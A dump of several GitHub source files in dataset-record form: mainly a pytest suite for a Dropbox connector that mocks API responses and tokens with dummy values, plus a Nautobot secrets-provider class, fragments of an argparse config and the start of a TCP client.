architecture')\n\n # batch size with 4\n parser.add_argument('--batch_size', type=int, default=256 * 256, help='Batch size')\n\n # epochs with 10\n parser.add_argument('--epochs', type=int, default=2000, help='Number of epochs')\n\n # learning rate with 0.001\n parser.add_argument('--lr', type=float, default=0.0001, help='Learning rate')\n\n # experiment name\n parser.add_argument('--exp_name', type=str, default='exp', help='Experiment name')\n\n return 
parser.parse_args()\n\n\n\n\n\n\n","repo_name":"pira998/coordinate_mlp","sub_path":"opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41170106840","text":"import json\nfrom unittest import mock\nfrom unittest.mock import ANY, AsyncMock, Mock, patch\n\nimport aiohttp\nimport pytest\nfrom aiohttp import StreamReader\nfrom aiohttp.client_exceptions import ClientResponseError, ServerDisconnectedError\nfrom freezegun import freeze_time\n\nfrom connectors.filtering.validation import SyncRuleValidationResult\nfrom connectors.protocol import Filter\nfrom connectors.source import ConfigurableFieldValueError, DataSourceConfiguration\nfrom connectors.sources.dropbox import (\n DropBoxAdvancedRulesValidator,\n DropboxClient,\n DropboxDataSource,\n InvalidClientCredentialException,\n InvalidPathException,\n InvalidRefreshTokenException,\n)\nfrom tests.commons import AsyncIterator\nfrom tests.sources.support import create_source\n\nPATH = \"/\"\nDUMMY_VALUES = \"abc#123\"\nADVANCED_SNIPPET = \"advanced_snippet\"\n\nHOST_URLS = {\n \"ACCESS_TOKEN_HOST_URL\": \"https://api.dropboxapi.com/\",\n \"FILES_FOLDERS_HOST_URL\": \"https://api.dropboxapi.com/2/\",\n \"DOWNLOAD_HOST_URL\": \"https://content.dropboxapi.com/2/\",\n}\nPING = \"users/get_current_account\"\n\nMOCK_CURRENT_USER = {\n \"account_id\": \"acc_id:1234\",\n \"name\": {\n \"given_name\": \"John\",\n \"surname\": \"Wilber\",\n \"display_name\": \"John Wilber\",\n \"abbreviated_name\": \"JW\",\n },\n \"email\": \"john.wilber@abcd.com\",\n \"country\": \"US\",\n}\n\nMOCK_CHECK_PATH = {\n \".tag\": \"folder\",\n \"name\": \"shared\",\n \"path_lower\": \"/shared\",\n \"path_display\": \"/shared\",\n \"id\": \"id:abcd\",\n \"shared_folder_id\": \"1234\",\n}\n\nMOCK_ACCESS_TOKEN = {\"access_token\": \"test2344\", \"expires_in\": \"1234555\"}\nMOCK_ACCESS_TOKEN_FOR_INVALID_REFRESH_TOKEN = {\"error\": \"invalid_grant\"}\nMOCK_ACCESS_TOKEN_FOR_INVALID_APP_KEY = {\n \"error\": \"invalid_client: Invalid client_id or client_secret\"\n}\n\nMOCK_FILES_FOLDERS = {\n \"entries\": [\n {\n \".tag\": \"folder\",\n \"name\": \"dummy folder\",\n \"path_lower\": \"/test/dummy folder\",\n \"path_display\": \"/test/dummy folder\",\n \"id\": \"id:1\",\n },\n ],\n \"cursor\": \"abcd#1234\",\n \"has_more\": True,\n}\n\nMOCK_FILES_FOLDERS_CONTINUE = {\n \"entries\": [\n {\n \".tag\": \"file\",\n \"name\": \"index.py\",\n \"path_lower\": \"/test/dummy folder/index.py\",\n \"path_display\": \"/test/dummy folder/index.py\",\n \"id\": \"id:2\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"is_downloadable\": True,\n },\n ],\n \"cursor\": None,\n \"has_more\": False,\n}\n\nEXPECTED_FILES_FOLDERS = [\n {\n \"_id\": \"id:1\",\n \"type\": \"Folder\",\n \"name\": \"dummy folder\",\n \"file_path\": \"/test/dummy folder\",\n \"size\": 0,\n \"_timestamp\": \"2023-01-01T06:06:06+00:00\",\n },\n {\n \"_id\": \"id:2\",\n \"type\": \"File\",\n \"name\": \"index.py\",\n \"file_path\": \"/test/dummy folder/index.py\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n]\n\nMOCK_SHARED_FILES = {\n \"entries\": [\n {\n \"access_type\": {\".tag\": \"viewer\"},\n \"name\": \"index1.py\",\n \"id\": \"id:1\",\n \"time_invited\": \"2023-01-01T06:06:06Z\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n },\n ],\n \"cursor\": 
\"abcd#1234\",\n}\n\nMOCK_SHARED_FILES_CONTINUE = {\n \"entries\": [\n {\n \"access_type\": {\".tag\": \"viewer\"},\n \"name\": \"index2.py\",\n \"id\": \"id:2\",\n \"time_invited\": \"2023-01-01T06:06:06Z\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n },\n ],\n \"cursor\": None,\n}\n\nMOCK_RECEIVED_FILE_METADATA_1 = {\n \"name\": \"index1.py\",\n \"id\": \"id:1\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"preview_type\": \"text\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n}\n\nMOCK_RECEIVED_FILE_METADATA_2 = {\n \"name\": \"index2.py\",\n \"id\": \"id:2\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"preview_type\": \"text\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n}\n\nEXPECTED_SHARED_FILES = [\n {\n \"_id\": \"id:1\",\n \"type\": \"File\",\n \"name\": \"index1.py\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index1.py?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n {\n \"_id\": \"id:2\",\n \"type\": \"File\",\n \"name\": \"index2.py\",\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/index2.py?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n]\n\nMOCK_ATTACHMENT = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_PAPER_FILE = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.paper\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.paper?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file.paper\",\n}\n\nSKIPPED_ATTACHMENT = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_ATTACHMENT_WITHOUT_EXTENSION = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file?dl=0\",\n \"is_downloadable\": False,\n \"path_display\": \"/test/dummy_file\",\n}\n\nMOCK_ATTACHMENT_WITH_LARGE_DATA = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.txt\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 23000000,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.txt?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.txt\",\n}\n\nMOCK_ATTACHMENT_WITH_UNSUPPORTED_EXTENSION = {\n \"id\": \"id:1\",\n \"name\": \"dummy_file.xyz\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 23000000,\n \"url\": \"https://www.dropbox.com/scl/fi/a1xtoxyu0ux73pd7e77ul/dummy_file.xyz?dl=0\",\n \"is_downloadable\": True,\n \"path_display\": \"/test/dummy_file.xyz\",\n}\n\nRESPONSE_CONTENT = \"# This is the dummy file\"\nEXPECTED_CONTENT = {\n \"_id\": \"id:1\",\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n \"_attachment\": 
\"IyBUaGlzIGlzIHRoZSBkdW1teSBmaWxl\",\n}\n\nMOCK_SEARCH_FILE_1 = {\n \"has_more\": False,\n \"matches\": [\n {\n \"match_type\": {\".tag\": \"filename_and_content\"},\n \"metadata\": {\n \".tag\": \"metadata\",\n \"metadata\": {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"abc123\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"500_Copy.py\",\n \"path_display\": \"/500_files/500_Copy.py\",\n \"path_lower\": \"/500_files/500_Copy.py\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 512000,\n },\n },\n }\n ],\n}\n\nMOCK_SEARCH_FILE_2 = {\n \"has_more\": False,\n \"matches\": [\n {\n \"match_type\": {\".tag\": \"filename_and_content\"},\n \"metadata\": {\n \".tag\": \"metadata\",\n \"metadata\": {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"abc321\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"dummy_file.txt\",\n \"preview_url\": \"https://www.dropbox.com/scl/fi/xyz456/dummy_file.txt?dl=0\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n },\n },\n }\n ],\n}\n\nMOCK_SEARCH_FILE_3 = {\n \".tag\": \"file\",\n \"client_modified\": \"2023-01-01T06:06:06Z\",\n \"content_hash\": \"pqr123\",\n \"id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"is_downloadable\": True,\n \"name\": \"dummy_file.txt\",\n \"url\": \"https://www.dropbox.com/scl/fi/pqr123/dummy_file.txt?dl=0\",\n \"rev\": \"015fbe2ba5a15440000000214a950e0\",\n \"server_modified\": \"2023-01-01T06:06:06Z\",\n \"size\": 200,\n}\n\n\nclass JSONAsyncMock(AsyncMock):\n def __init__(self, json, status, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._json = json\n self.status = status\n\n async def json(self):\n return self._json\n\n\nclass StreamReaderAsyncMock(AsyncMock):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.content = StreamReader\n\n\ndef get_json_mock(mock_response, status):\n async_mock = AsyncMock()\n async_mock.__aenter__ = AsyncMock(\n return_value=JSONAsyncMock(json=mock_response, status=status)\n )\n return async_mock\n\n\ndef get_stream_reader():\n async_mock = AsyncMock()\n async_mock.__aenter__ = AsyncMock(return_value=StreamReaderAsyncMock())\n return async_mock\n\n\ndef setup_dropbox():\n # Set up default config with default values\n source = create_source(DropboxDataSource)\n source.configuration.set_field(name=\"app_key\", value=\"abc#123\")\n source.configuration.set_field(name=\"app_secret\", value=\"abc#123\")\n source.configuration.set_field(name=\"refresh_token\", value=\"abc#123\")\n return source\n\n\n@pytest.mark.asyncio\nasync def test_configuration():\n \"\"\"Tests the get configurations method of the Dropbox source class.\"\"\"\n config = DataSourceConfiguration(\n config=DropboxDataSource.get_default_configuration()\n )\n assert config[\"path\"] == PATH\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"field\",\n [\"path\", \"app_key\", \"app_secret\", \"refresh_token\"],\n)\nasync def test_validate_configuration_with_empty_fields_then_raise_exception(field):\n source = setup_dropbox()\n source.dropbox_client.configuration.set_field(name=field, value=\"\")\n\n with pytest.raises(ConfigurableFieldValueError):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\nasync def test_validate_configuration_with_valid_path():\n source = setup_dropbox()\n 
source.dropbox_client.configuration.set_field(name=\"path\", value=\"/shared\")\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=JSONAsyncMock(json=MOCK_CHECK_PATH, status=200),\n ):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_validate_configuration_with_invalid_path_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n source.dropbox_client.path = \"/abc\"\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=ClientResponseError(\n status=409,\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=None,\n ),\n ):\n with pytest.raises(\n InvalidPathException, match=\"Configured Path: /abc is invalid\"\n ):\n await source.validate_config()\n\n\n@pytest.mark.asyncio\nasync def test_set_access_token():\n source = setup_dropbox()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(mock_response=MOCK_ACCESS_TOKEN, status=200),\n ):\n await source.dropbox_client._set_access_token()\n assert source.dropbox_client.access_token == \"test2344\"\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_set_access_token_with_incorrect_app_key_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(\n mock_response=MOCK_ACCESS_TOKEN_FOR_INVALID_APP_KEY, status=400\n ),\n ):\n with pytest.raises(\n InvalidClientCredentialException,\n match=\"Configured App Key or App Secret is invalid.\",\n ):\n await source.dropbox_client._set_access_token()\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_set_access_token_with_incorrect_refresh_token_then_raise_exception(\n mock_apply_retry_strategy,\n):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(\n mock_response=MOCK_ACCESS_TOKEN_FOR_INVALID_REFRESH_TOKEN, status=400\n ),\n ):\n with pytest.raises(\n InvalidRefreshTokenException, match=\"Configured Refresh Token is invalid.\"\n ):\n await source.dropbox_client._set_access_token()\n\n\ndef test_tweak_bulk_options():\n source = setup_dropbox()\n\n source.concurrent_downloads = 10\n options = {\"concurrent_downloads\": 5}\n\n source.tweak_bulk_options(options)\n assert options[\"concurrent_downloads\"] == 10\n\n\n@pytest.mark.asyncio\nasync def test_close_with_client_session():\n source = setup_dropbox()\n _ = source.dropbox_client._get_session\n\n await source.close()\n assert hasattr(source.dropbox_client.__dict__, \"_get_session\") is False\n\n\n@pytest.mark.asyncio\nasync def test_ping():\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(MOCK_CURRENT_USER, 200),\n ):\n await source.ping()\n\n\n@pytest.mark.asyncio\n@patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0)\nasync def test_api_call_negative():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 4\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession, \"post\", side_effect=Exception(\"Something 
went wrong\")\n ):\n with pytest.raises(Exception):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n\n with patch.object(\n aiohttp.ClientSession, \"post\", side_effect=ServerDisconnectedError()\n ):\n with pytest.raises(Exception):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n\n\n@pytest.mark.asyncio\nasync def test_api_call():\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n return_value=get_json_mock(MOCK_CURRENT_USER, 200),\n ):\n EXPECTED_RESPONSE = {\n \"account_id\": \"acc_id:1234\",\n \"name\": {\n \"given_name\": \"John\",\n \"surname\": \"Wilber\",\n \"display_name\": \"John Wilber\",\n \"abbreviated_name\": \"JW\",\n },\n \"email\": \"john.wilber@abcd.com\",\n \"country\": \"US\",\n }\n response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await response.json()\n assert actual_response == EXPECTED_RESPONSE\n\n\n@pytest.mark.asyncio\nasync def test_paginated_api_call_when_skipping_api_call():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 1\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n source.dropbox_client, \"api_call\", side_effect=Exception(\"Something went wrong\")\n ):\n async for response in source.dropbox_client._paginated_api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n breaking_field=\"xyz\",\n continue_endpoint=\"shared_file\",\n data={\"data\": \"xyz\"},\n url_name=\"url_name\",\n ):\n assert response is None\n\n\n@pytest.mark.asyncio\nasync def test_set_access_token_when_token_expires_at_is_str():\n source = setup_dropbox()\n source.dropbox_client.token_expiration_time = \"2023-02-10T09:02:23.629821\"\n mock_token = {\"access_token\": \"test2344\", \"expires_in\": \"1234555\"}\n async_response_token = get_json_mock(mock_token, 200)\n\n with patch.object(aiohttp.ClientSession, \"post\", return_value=async_response_token):\n actual_response = await source.dropbox_client._set_access_token()\n assert actual_response is None\n\n\n@pytest.fixture\ndef patch_default_wait_multiplier():\n with mock.patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0):\n yield\n\n\n@pytest.mark.asyncio\n@mock.patch(\"connectors.sources.dropbox.RETRY_INTERVAL\", 0)\n@mock.patch(\"connectors.utils.apply_retry_strategy\")\nasync def test_api_call_when_token_is_expired(mock_apply_retry_strategy):\n source = setup_dropbox()\n mock_apply_retry_strategy.return_value = mock.Mock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=[\n ClientResponseError(\n status=401,\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=None,\n message=\"Unauthorized\",\n ),\n get_json_mock(MOCK_ACCESS_TOKEN, 200),\n get_json_mock(MOCK_FILES_FOLDERS, 200),\n ],\n ):\n actual_response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await actual_response.json()\n assert actual_response == MOCK_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\nasync def test_api_call_when_status_429_exception():\n source = setup_dropbox()\n\n 
source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=[\n ClientResponseError(\n status=429,\n headers={\"Retry-After\": 0},\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=(),\n ),\n get_json_mock(MOCK_FILES_FOLDERS, 200),\n ],\n ):\n _ = source.dropbox_client._get_session\n response = await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n actual_response = await response.json()\n assert actual_response == MOCK_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\n@patch(\"connectors.sources.dropbox.DEFAULT_RETRY_AFTER\", 0)\nasync def test_api_call_when_status_429_exception_without_retry_after_header():\n source = setup_dropbox()\n source.dropbox_client.retry_count = 1\n\n source.dropbox_client._set_access_token = AsyncMock()\n\n with patch.object(\n aiohttp.ClientSession,\n \"post\",\n side_effect=ClientResponseError(\n status=429,\n headers={},\n request_info=aiohttp.RequestInfo(\n real_url=\"\", method=None, headers=None, url=\"\"\n ),\n history=(),\n ),\n ):\n _ = source.dropbox_client._get_session\n with pytest.raises(ClientResponseError):\n await anext(\n source.dropbox_client.api_call(\n base_url=HOST_URLS[\"FILES_FOLDERS_HOST_URL\"],\n url_name=PING,\n data=json.dumps(None),\n )\n )\n await source.close()\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"attachment, is_shared, expected_content\",\n [\n (MOCK_ATTACHMENT, False, EXPECTED_CONTENT),\n (MOCK_PAPER_FILE, False, EXPECTED_CONTENT),\n (MOCK_ATTACHMENT, True, EXPECTED_CONTENT),\n (MOCK_ATTACHMENT_WITHOUT_EXTENSION, False, None),\n (MOCK_ATTACHMENT_WITH_LARGE_DATA, False, None),\n (MOCK_ATTACHMENT_WITH_UNSUPPORTED_EXTENSION, False, None),\n (SKIPPED_ATTACHMENT, False, None),\n ],\n)\nasync def test_get_content_when_is_downloadable_is_true(\n attachment, is_shared, expected_content\n):\n source = setup_dropbox()\n source.dropbox_client._set_access_token = AsyncMock()\n\n with mock.patch(\"aiohttp.ClientSession.post\", return_value=get_stream_reader()):\n with mock.patch(\n \"aiohttp.StreamReader.iter_chunked\",\n return_value=AsyncIterator([bytes(RESPONSE_CONTENT, \"utf-8\")]),\n ):\n response = await source.get_content(\n attachment=attachment,\n is_shared=is_shared,\n doit=True,\n )\n assert response == expected_content\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_fetch_files_folders():\n source = setup_dropbox()\n source.dropbox_client.path = \"/\"\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_FILES_FOLDERS, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_FILES_FOLDERS_CONTINUE, status=200)]),\n ],\n ):\n async for document, _ in source._fetch_files_folders(\"/\"):\n actual_response.append(document)\n\n assert actual_response == EXPECTED_FILES_FOLDERS\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_fetch_shared_files():\n source = setup_dropbox()\n source.dropbox_client.path = \"/\"\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_SHARED_FILES, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_RECEIVED_FILE_METADATA_1, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_SHARED_FILES_CONTINUE, status=200)]),\n 
AsyncIterator([JSONAsyncMock(MOCK_RECEIVED_FILE_METADATA_2, status=200)]),\n ],\n ):\n async for document, _ in source._fetch_shared_files():\n actual_response.append(document)\n\n assert actual_response == EXPECTED_SHARED_FILES\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\nasync def test_search_files():\n source = setup_dropbox()\n rule = {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/500_files\",\n \"file_status\": \"active\",\n },\n }\n\n actual_response = []\n with patch.object(\n source.dropbox_client,\n \"api_call\",\n side_effect=[\n AsyncIterator([JSONAsyncMock(MOCK_SEARCH_FILE_1, status=200)]),\n AsyncIterator([JSONAsyncMock(MOCK_SEARCH_FILE_2, status=200)]),\n ],\n ):\n async for document, _ in source.advanced_sync(rule=rule):\n actual_response.append(document)\n\n assert actual_response == [\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"500_Copy.py\",\n \"file_path\": \"/500_files/500_Copy.py\",\n \"size\": 512000,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n }\n ]\n\n\n@pytest.mark.asyncio\n@freeze_time(\"2023-01-01T06:06:06\")\n@patch.object(\n DropboxDataSource,\n \"_fetch_files_folders\",\n side_effect=AsyncIterator(\n [\n (EXPECTED_FILES_FOLDERS[0], \"files-folders\"),\n (EXPECTED_FILES_FOLDERS[1], \"files-folders\"),\n ],\n ),\n)\n@patch.object(\n DropboxDataSource,\n \"_fetch_shared_files\",\n return_value=AsyncIterator(\n [\n (EXPECTED_SHARED_FILES[0], \"shared_files\"),\n (EXPECTED_SHARED_FILES[1], \"shared_files\"),\n ],\n ),\n)\nasync def test_get_docs(files_folders_patch, shared_files_patch):\n source = setup_dropbox()\n expected_responses = [*EXPECTED_FILES_FOLDERS, *EXPECTED_SHARED_FILES]\n source.get_content = Mock(return_value=EXPECTED_CONTENT)\n\n documents = []\n async for item, _ in source.get_docs():\n documents.append(item)\n\n assert documents == expected_responses\n\n\n@pytest.mark.parametrize(\n \"advanced_rules, expected_validation_result\",\n [\n (\n [\n {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/invalid_path\",\n \"file_status\": {\".tag\": \"active\"},\n },\n }\n ],\n SyncRuleValidationResult(\n SyncRuleValidationResult.ADVANCED_RULES,\n is_valid=False,\n validation_message=ANY,\n ),\n )\n ],\n)\n@pytest.mark.asyncio\nasync def test_advanced_rules_validation_with_invalid_repos(\n advanced_rules, expected_validation_result\n):\n source = setup_dropbox()\n source.dropbox_client.check_path = AsyncMock(side_effect=InvalidPathException())\n\n validation_result = await DropBoxAdvancedRulesValidator(source).validate(\n advanced_rules\n )\n\n assert validation_result == expected_validation_result\n\n\n@pytest.mark.parametrize(\n \"filtering\",\n [\n Filter(\n {\n ADVANCED_SNIPPET: {\n \"value\": [\n {\n \"query\": \"copy\",\n \"options\": {\n \"path\": \"/500_files\",\n \"file_status\": {\n \".tag\": \"active\",\n },\n },\n },\n {\n \"query\": \"dummy\",\n \"options\": {\n \"file_extensions\": [\"txt\"],\n },\n },\n {\n \"query\": \"manager\",\n \"options\": {\n \"file_categories\": [{\".tag\": \"paper\"}, {\".tag\": \"pdf\"}],\n },\n },\n ]\n }\n }\n ),\n ],\n)\n@patch.object(\n DropboxClient,\n \"search_files_folders\",\n side_effect=AsyncIterator(\n [\n MOCK_SEARCH_FILE_1,\n MOCK_SEARCH_FILE_2,\n ],\n ),\n)\n@patch.object(\n DropboxClient,\n \"api_call\",\n side_effect=AsyncIterator(\n [JSONAsyncMock(MOCK_SEARCH_FILE_3, 200)],\n ),\n)\n@pytest.mark.asyncio\nasync def test_get_docs_with_advanced_rules(\n received_files_patch, files_folders_patch, filtering\n):\n source = 
setup_dropbox()\n source.get_content = Mock(return_value=EXPECTED_CONTENT)\n\n documents = []\n async for item, _ in source.get_docs(filtering):\n documents.append(item)\n\n assert documents == [\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"500_Copy.py\",\n \"file_path\": \"/500_files/500_Copy.py\",\n \"size\": 512000,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n {\n \"_id\": \"id:bJ86SIuuyXkAAAAAAAAAEQ\",\n \"type\": \"File\",\n \"name\": \"dummy_file.txt\",\n \"url\": \"https://www.dropbox.com/scl/fi/pqr123/dummy_file.txt?dl=0\",\n \"size\": 200,\n \"_timestamp\": \"2023-01-01T06:06:06Z\",\n },\n ]\n","repo_name":"elastickent/es_sn_cmdb","sub_path":"tests/sources/test_dropbox.py","file_name":"test_dropbox.py","file_ext":"py","file_size_in_byte":28571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16674861932","text":"from django import forms\nfrom nautobot.apps.secrets import SecretsProvider\nfrom nautobot.extras.secrets.exceptions import SecretParametersError, SecretValueNotFoundError\nfrom nautobot.utilities.forms import BootstrapMixin\n\nfrom . import Settings, SecretStr\n\n\nclass EncryptedConfigSecretsProvider(SecretsProvider):\n \"\"\"\n Encrypted Config SecretsProvider\n\n This SecretsProvider is used to retrieve secrets from the Nautobot configuration Settings class.\n \"\"\"\n\n slug = \"encrypted-config\" # type: ignore\n name = \"Encrypted Config\" # type: ignore\n\n class ParametersForm(BootstrapMixin, forms.Form):\n \"\"\"\n User-friendly form for specifying the required parameters of this provider.\n \"\"\"\n config_key = forms.CharField(\n required=True,\n help_text=\"dotted path to the key in the `uoft_nautobot.Settings` class\"\n )\n\n @classmethod\n def get_value_for_secret(cls, secret, obj=None, **kwargs):\n \"\"\"Retrieve the appropriate Settings class variable's value.\"\"\"\n rendered_parameters = secret.rendered_parameters(obj=obj)\n if \"config_key\" not in rendered_parameters:\n raise SecretParametersError(secret, cls, 'The \"config_key\" parameter is mandatory!')\n key_path = rendered_parameters[\"config_key\"].split(\".\")\n s = Settings.from_cache()\n try:\n for key in key_path:\n s = getattr(s, key)\n except KeyError:\n raise SecretValueNotFoundError(\n secret, cls, f'Undefined key \"{rendered_parameters[\"config_key\"]}\"!'\n )\n if isinstance(s, SecretStr):\n s = s.get_secret_value()\n return s\n\n\nsecrets_providers = [EncryptedConfigSecretsProvider]\n","repo_name":"uoft-networking/tools","sub_path":"projects/nautobot/uoft_nautobot/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41035561044","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Author:Pxz\n# @Time :2019/1/18 0018上午 11:44\n\nimport socket\nimport threading\n\n\ndef client_tcp():\n c_socket = 